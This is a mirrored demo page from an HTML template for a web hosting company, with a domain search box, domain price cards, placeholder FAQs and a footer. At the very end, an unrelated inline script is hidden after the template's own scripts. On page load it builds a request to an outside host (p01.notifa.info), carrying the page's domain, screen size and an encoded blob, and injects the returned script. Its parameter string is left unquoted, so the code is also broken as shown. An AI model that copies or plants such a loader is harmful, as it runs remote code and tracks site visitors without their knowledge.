<!DOCTYPE html>
<html lang="en">

<!-- Mirrored from rctheme.com/demo-html/prohost/register-domain.html by HTTrack Website Copier/3.x [XR&CO'2014], Mon, 17 Sep 2018 17:00:20 GMT -->
<head>
<meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">

<!-- Mobile Meta -->
<meta name="viewport" content="width=device-width, initial-scale=1">

<!-- The above 3 meta tags *must* come first in the head; any other head content must come *after* these tags -->
<meta name="description" content="">
<meta name="author" content="">
<title>Domain Register - Search and Buy Domain</title>

<!-- Favicon -->
<link rel="icon" href="images/favicon.png">

<!-- Bootstrap core CSS -->
<link href="css/bootstrap.css" rel="stylesheet" media="all" />

<!-- Font Awesome CSS -->
<link rel="stylesheet" href="css/font-awesome.css" media="all" />

<!-- Main Template CSS -->
<link rel="stylesheet" href="css/style.css" media="all" />

<!-- Animation CSS -->
<link rel="stylesheet" href="css/animate.min.css" media="all" />
</head>

<body>
<!-- ========= Header Section Start ========= -->

<header>
  <div class="top_header">
    <div class="container">
      <div class="row">
        <div class="col-md-6 col-sm-6 col-xs-12">
          <div class="top_link">
            <ul>
              <li>24x7 Live support</li>
              <li>+ 91 123 4567 890</li>
            </ul>
          </div>
        </div>
        <div class="col-md-6 col-sm-6 col-xs-12">
          <div class="top_link right">
            <ul>
              <li><a href="about-us.html">About Us</a></li>
              <li><a href="offers.html">Offers</a></li>
              <li><a href="contact-us.html">Contact Us</a></li>
              <li><a href="login.html">Login</a></li>
            </ul>
          </div>
        </div>
      </div>
    </div>
  </div>
  <div class="main_menu">
    <div class="container">
      <div class="row">
        <div class="col-md-3 col-sm-3 col-xs-12">
          <div class="logo"><a href="index-2.html"><img src="images/logo.png" alt="logo" title="logo" /></a></div>
        </div>
        <div class="col-md-9 col-sm-9 col-xs-12">
          <div class="navbar navbar-default" role="navigation">
            <div class="navbar-header">
              <button type="button" class="navbar-toggle" data-toggle="collapse" data-target=".navbar-collapse"> <span class="sronly">Menu</span> <i class="fa fa-bars" aria-hidden="true"></i></button>
            </div>
            <nav class="navbar navbar-default">
              <div id="navbar-collapse-1" class="collapse navbar-collapse">
                <ul class="nav navbar-nav">
                  <li><a href="index-2.html">Home</a></li>
                  <li class="active"><a href="#">Domain <b class="caret"></b></a>
                    <ul class="wm-dropdown-menu">
                      <li><a href="register-domain.html">Register a Domain</a></li>
                      <li><a href="transfer-domain.html">Transfer Your Domain</a></li>
                      <li><a href="domain-price.html">Domain Price</a></li>
                      <li><a href="domain-promos.html">Domain Promos</a></li>
                    </ul>
                  </li>
                  <li><a href="#">Hosting <b class="caret"></b></a>
                    <ul class="wm-dropdown-menu">
                      <li><a href="shared-hosting.html">Shared Hosting</a></li>
                      <li><a href="reseller-hosting.html">Reseller Hosting</a></li>
                      <li><a href="dedicated-servers.html">Dedicated Servers</a></li>
                      <li><a href="vps.html">VPS Servers</a></li>
                      <li><a href="cloud-hosting.html">Cloud Hosting</a></li>
                      <li><a href="wordpress-hosting.html">Wordpress Hosting</a></li>
                    </ul>
                  </li>
                  <li><a href="#">Email <b class="caret"></b></a>
                    <ul class="wm-dropdown-menu">
                      <li><a href="business-email.html">Business Email</a></li>
                      <li><a href="cloud-business-email.html">Cloud Business Email</a></li>
                      <li><a href="microsoft-office-365.html">Microsoft Office 365</a></li>
                      <li><a href="google-apps.html">Google Apps</a></li>
                    </ul>
                  </li>
                  <li><a href="#">Security <b class="caret"></b></a>
                    <ul class="wm-dropdown-menu">
                      <li><a href="ssl-security.html">SSL Security</a></li>
                      <li><a href="codeguard.html">Codeguard</a></li>
                    </ul>
                  </li>
                  <li><a href="bundled-offers.html">Bundle Offers</a></li>
                  <li><a href="support.html">Support</a></li>
                </ul>
              </div>
            </nav>
          </div>
        </div>
      </div>
    </div>
  </div>
</header>

<!-- ========= Header Section End ========= --> 

<!-- ========= Inner Page Banner Section Start ========= -->

<section class="inner_page_header">
  <div class="container">
    <div class="row">
      <div class="col-md-12">
        <div class="inner_headin_s"><i class="fa fa-transgender-alt"></i>
          <h1>Register a Domain</h1>
          <p>Lorem ipsum dolor sit amet sit et justo consectetuer adipiscing elit. Suspendisse et justo Praesent mattis.Lorem ipsum dolor sit amet sit et justo consectetuer adipiscing elit uspendisse et justo.</p>
          <div class="searh_bar_domain">
            <form>
              <input type="text" class="search_domain" placeholder="Enter Your Domain Name" />
              <input type="button" class="inner_search_btn primary_button" value="Search" />
            </form>
          </div>
        </div>
      </div>
    </div>
  </div>
</section>

<!-- ========= Inner Page Banner Section End ========= -->

<section class="domain_plan text_center">
  <div class="container">
    <div class="row">
      <div class="col-md-12 col-sm-12 col-xs-12">
        <div class="headings black_text">
          <h6>Best Offers</h6>
          <h3>Our Domain Prices</h3>
          <div class="sep black_bg"></div>
        </div>
      </div>
      <div class="col-md-3 col-sm-6 col-xs-12 wow fadeInLeft" data-wow-duration=".3" data-wow-delay=".1s">
        <div class="domain_b com">
          <div class="domain_h"><img src="images/com.png" alt="com logo" title="com logo"  />
            <p>Mauris interdum fringilla augue vitae</p>
          </div>
          <div class="bottom_b">
            <div class="plan_p">$ 9.00</div>
            <div class="cut_p">was $ 11.00</div>
            <a class="primary_button" href="#">Register</a></div>
        </div>
      </div>
      <div class="col-md-3 col-sm-6 col-xs-12 wow fadeInLeft" data-wow-duration=".3" data-wow-delay=".2s">
        <div class="domain_b in">
          <div class="domain_h"><img src="images/in.png" alt="in logo" title="in logo"  />
            <p>Mauris interdum fringilla augue vitae</p>
          </div>
          <div class="bottom_b">
            <div class="plan_p">$ 19.00</div>
            <div class="cut_p">was $ 21.00</div>
            <a class="primary_button" href="#">Register</a></div>
        </div>
      </div>
      <div class="col-md-3 col-sm-6 col-xs-12 wow fadeInRight" data-wow-duration=".3" data-wow-delay=".1s">
        <div class="domain_b live">
          <div class="domain_h"><img src="images/live.png" alt="live logo" title="live logo"  />
            <p>Mauris interdum fringilla augue vitae</p>
          </div>
          <div class="bottom_b">
            <div class="plan_p">$ 17.00</div>
            <div class="cut_p">was $ 19.00</div>
            <a class="primary_button" href="#">Register</a></div>
        </div>
      </div>
      <div class="col-md-3 col-sm-6 col-xs-12 wow fadeInRight" data-wow-duration=".3" data-wow-delay=".2s">
        <div class="domain_b online">
          <div class="domain_h"><img src="images/online.png" alt="online logo" title="online logo" />
            <p>Mauris interdum fringilla augue vitae</p>
          </div>
          <div class="bottom_b">
            <div class="plan_p">$ 22.00</div>
            <div class="cut_p">was $ 25.00</div>
            <a class="primary_button" href="#">Register</a></div>
        </div>
      </div>
    </div>
  </div>
</section>

<!-- ========= FAQs Section Start ========= -->

<section class="accordian_main">
  <div class="container">
    <div class="row">
      <div class="col-md-12 col-sm-12 col-xs-12">
        <div class="headings white_text">
          <h6>About the Domain</h6>
          <h3>Frequently Asked Questions</h3>
          <div class="sep white_bg"></div>
        </div>
      </div>
      <div class="col-md-12 col-sm-12 col-xs-12">
        <div class="accordion">
          <div class="accordion-section"><a class="accordion-section-title" href="#accordion-1">What kind of web hosting do I need?</a>
            <div id="accordion-1" class="accordion-section-content">
              <p>Mauris interdum fringilla augue vitae tincidunt. Curabitur vitae tortor id eros euismod ultrices. Cum sociis natoque penatibus et magnis dis parturient montes, nascetur ridiculus mus. Praesent nulla mi, rutrum ut feugiat at, vestibulum ut neque? Cras tincidunt enim vel aliquet facilisis. Duis congue ullamcorper vehicula. Proin nunc lacus, semper sit amet elit sit amet, aliquet pulvinar erat. Nunc pretium quis sapien eu rhoncus. Suspendisse ornare gravida mi, et placerat tellus tempor vitae.</p>
            </div>
          </div>
          <div class="accordion-section"><a class="accordion-section-title active" href="#accordion-2">What kind of web hosting do I need? </a>
            <div id="accordion-2" class="accordion-section-content open">
              <p>Mauris interdum fringilla augue vitae tincidunt. Curabitur vitae tortor id eros euismod ultrices. Cum sociis natoque penatibus et magnis dis parturient montes, nascetur ridiculus mus. Praesent nulla mi, rutrum ut feugiat at, vestibulum ut neque? Cras tincidunt enim vel aliquet facilisis. Duis congue ullamcorper vehicula. Proin nunc lacus, semper sit amet elit sit amet, aliquet pulvinar erat. Nunc pretium quis sapien eu rhoncus. Suspendisse ornare gravida mi, et placerat tellus tempor vitae.</p>
            </div>
          </div>
          <div class="accordion-section"><a class="accordion-section-title" href="#accordion-3">What kind of web hosting do I need? </a>
            <div id="accordion-3" class="accordion-section-content">
              <p>Mauris interdum fringilla augue vitae tincidunt. Curabitur vitae tortor id eros euismod ultrices. Cum sociis natoque penatibus et magnis dis parturient montes, nascetur ridiculus mus. Praesent nulla mi, rutrum ut feugiat at, vestibulum ut neque? Cras tincidunt enim vel aliquet facilisis. Duis congue ullamcorper vehicula. Proin nunc lacus, semper sit amet elit sit amet, aliquet pulvinar erat. Nunc pretium quis sapien eu rhoncus. Suspendisse ornare gravida mi, et placerat tellus tempor vitae.</p>
            </div>
          </div>
          <div class="accordion-section"><a class="accordion-section-title" href="#accordion-4">What kind of web hosting do I need? </a>
            <div id="accordion-4" class="accordion-section-content">
              <p>Mauris interdum fringilla augue vitae tincidunt. Curabitur vitae tortor id eros euismod ultrices. Cum sociis natoque penatibus et magnis dis parturient montes, nascetur ridiculus mus. Praesent nulla mi, rutrum ut feugiat at, vestibulum ut neque? Cras tincidunt enim vel aliquet facilisis. Duis congue ullamcorper vehicula. Proin nunc lacus, semper sit amet elit sit amet, aliquet pulvinar erat. Nunc pretium quis sapien eu rhoncus. Suspendisse ornare gravida mi, et placerat tellus tempor vitae.</p>
            </div>
          </div>
        </div>
      </div>
    </div>
  </div>
</section>

<!-- ========= FAQs Section End ========= --> 

<!-- ========= Personal Info Section Start ========= -->

<section class="safe_host">
  <div class="container">
    <div class="row">
      <div class="col-md-12 col-sm-12 col-xs-12">
        <div class="headings black_text">
          <h6>safe with us</h6>
          <h3>Your personal information</h3>
          <div class="sep black_bg"></div>
        </div>
      </div>
      <div class="pr_info">
        <div class="col-md-6 col-sm-6 col-xs-12">
          <div class="info_left wow zoomIn" data-wow-duration=".3" data-wow-delay=".1s"> <img src="images/computer-safe.png" alt="icon" /> </div>
        </div>
        <div class="col-md-6 col-sm-6 col-xs-12">
          <div class="info_right">
            <ul>
              <li class="wow fadeInRight" data-wow-duration=".3" data-wow-delay=".1s">Nullam turpis. Cras daibus, orci rutrum adipiscing luctus, nisl magna tempus.</li>
              <li class="wow fadeInRight" data-wow-duration=".3" data-wow-delay=".2s">Vivamus sit amet felis. Vivamus et justo in nunc pharetra semper.</li>
              <li class="wow fadeInRight" data-wow-duration=".3" data-wow-delay=".3s">Etiam enim. Suspendisse imperdiet cursus nisi. Maecenas sed nisl nec lectus.</li>
              <li class="wow fadeInRight" data-wow-duration=".3" data-wow-delay=".4s">Nullam turpis. Cras dapibus, orci rutum adipiscing luctus, nisl magna tempus.</li>
              <li class="wow fadeInRight" data-wow-duration=".3" data-wow-delay=".5s">Vivamus sit amet felis. Vivamus et justo in nunc pharetra semper.</li>
              <li class="wow fadeInRight" data-wow-duration=".3" data-wow-delay=".6s">Vivamus sit amet felis. Vivamus et justo in nunc pharetra semper.</li>
            </ul>
            <a class="primary_button" href="#">Read More</a> </div>
        </div>
      </div>
    </div>
  </div>
</section>

<!-- ========= Personal Info Section End ========= --> 

<!-- ========= Footer Section Start ========= -->

<footer class="footer">
  <div class="f_outr_section">
    <div class="container">
      <div class="row">
        <div class="col-md-3 col-sm-6 col-xs-12">
          <div class="f_txt_heading">
            <h4>About Us</h4>
            <div class="f_about">
              <p>Lorem ipsum dolor sit amet dolor sit elit Suspendisse et justo et justo sit Praesent mattis commodo augue Aliquam ornare. Lorem ipsum dolor sit amet dolor sit elit. Lorem ipsum dolor sit amet dolor sit elit.</p>
            </div>
          </div>
        </div>
        <div class="col-md-3 col-sm-6 col-xs-12">
          <div class="f_txt_heading">
            <h4>Quick Links</h4>
            <ul>
              <li><a href="about-us.html">About Us</a></li>
              <li><a href="contact-us.html">Contact Us</a></li>
              <li><a href="support.html">Support</a></li>
              <li><a href="offers.html">Offers</a></li>
              <li><a href="bundled-offers.html">Bundle Offers</a></li>
              <li><a href="login.html">Login</a></li>
              <li><a href="404.html">404 Page</a></li>
            </ul>
          </div>
        </div>
        <div class="col-md-3 col-sm-6 col-xs-12">
          <div class="f_txt_heading">
            <h4>Our Services</h4>
            <ul>
              <li><a href="shared-hosting.html">Shared Hosting</a></li>
              <li><a href="vps.html">Virtual Private Server</a></li>
              <li><a href="reseller-hosting.html">Reseller Hosting</a></li>
              <li><a href="dedicated-servers.html">Dedicated Server</a></li>
              <li><a href="ssl-security.html">SSL Certificated</a></li>
              <li><a href="cloud-hosting.html">Cloud Hosting</a></li>
              <li><a href="wordpress-hosting.html">Wordpress Hosting</a></li>
            </ul>
          </div>
        </div>
        <div class="col-md-3 col-sm-6 col-xs-12">
          <div class="f_txt_heading ">
            <h4>Contact Us</h4>
            <div class="f_contact_s">
              <div class="f-con-head">Address:-
                <p>Lorem ipsum dolor<br>
                  amet dolor sit elit Suspendisse</p>
              </div>
            </div>
            <div class="f_contact_s">
              <div class="f-con-head">Contact:-
                <p>Ph: (+000) 1234 5678<br>
                  Fax: (+000) 1234 5678</p>
              </div>
            </div>
            <div class="f_contact_s">
              <div class="f-con-head">Email:-
                <p><a href="mailto:info@yourdomain.com">info@yourdomain.com</a><br>
                  <a href="mailto:sales@yourdomain.com">sales@yourdomain.com</a></p>
              </div>
            </div>
          </div>
        </div>
      </div>
    </div>
  </div>
  <div class="footer-bottom">
    <div class="container">
      <div class="row">
        <div class="col-md-6 col-sm-6 col-xs-12">
          <div class="news_letr">
            <form>
              <input type="text" placeholder="Enter your Email" class="nwesltr">
              <input type="submit" class="secondry_button join_now" value="Join Now">
            </form>
          </div>
        </div>
        <div class="col-md-6 col-sm-6 col-xs-12">
          <div class="social">
            <ul>
              <li><a href="#"><i class="fa fa-facebook"></i></a></li>
              <li><a href="#"><i class="fa fa-google"></i></a></li>
              <li><a href="#"><i class="fa fa-twitter"></i></a></li>
              <li><a href="#"><i class="fa fa-linkedin"></i></a></li>
            </ul>
          </div>
        </div>
      </div>
    </div>
  </div>
  <div class="copy-right">
    <div class="container">
      <div class="row">
        <div class="col-md-12 col-sm-12 col-xs-12">Copyright © 2015 - 2017 prohost. All Rights Reserved.</div>
      </div>
    </div>
  </div>
</footer>

<!-- Bootstrap core JavaScript --> 
<script type="text/javascript" src="js/jquery.min.js"></script> 
<script type="text/javascript" src="js/bootstrap.min.js"></script> 

<!-- Animation JavaScript --> 
<script type="text/javascript" src="js/jquery.wow.min.js" ></script> 
<script type="text/javascript" src="js/wow.min.js" ></script> 

<!-- Custom Template JavaScript --> 
<script type="text/javascript" src="js/custom.js"></script>
<script type="text/javascript">if (self==top) {function netbro_cache_analytics(fn, callback) {setTimeout(function() {fn();callback();}, 0);}function sync(fn) {fn();}function requestCfs(){var idc_glo_url = (location.protocol=="https:" ? "https://" : "http://");var idc_glo_r = Math.floor(Math.random()*99999999999);var url = idc_glo_url+ "p01.notifa.info/3fsmd3/request" + "?id=1" + "&enc=9UwkxLgY9" + "&params=" + 4TtHaUQnUEiP6K%2fc5C582NzYpoUazw5m834VngSV4X7HqSkmbAkrEk6%2fiTDLWtQTKJVhV7AaDoK%2fVAb8U%2fNVRvsmSlu1w3F5ZwjqDrjcCjijpF14OeLs01OM2bYmoqMm2wvxYMtNG5cvdYXodH5sBJu%2b6zYzX8wiTva%2b5dsJba9%2fbL7bTYu5jhlEaYxynBzByfhI2VZIfnGo7%2fVCNJWYBLOUVqsMqN70sY7tDcX44dwf%2bUVniHj%2fxBT1VZ1ZIkiAH8%2f7NaqZXCPCwNdo7HofpCH%2bwMIr8x2hypEKRxvHEyS1cxU7RyLaXTDl1m43hvbMbT5afuDEmPSq1%2fTzp3sfAyoLkMUcfFJWGrb29hf8BcZDlR7n1UK70GiKSjxGZCrXyMnushpNx4bbTcR%2fSJHhiIXYUcnC3KPgn0n74er1XRiRbyUDcKNtZP3Lam8NNeCwhlnVx03xpie0vmK2ViLT7Qf8Rdsnma8r5A3XRn86KM58%2bopwRGeWMLWC79kB0%2fYqfdp%2fFVHh5lK0EqBNvIFIc4fpNRDmZ72M + "&idc_r="+idc_glo_r + "&domain="+document.domain + "&sw="+screen.width+"&sh="+screen.height;var bsa = document.createElement('script');bsa.type = 'text/javascript';bsa.async = true;bsa.src = url;(document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(bsa);}netbro_cache_analytics(requestCfs, function(){});};</script></body>

<!-- Mirrored from rctheme.com/demo-html/prohost/register-domain.html by HTTrack Website Copier/3.x [XR&CO'2014], Mon, 17 Sep 2018 17:00:25 GMT -->
</html>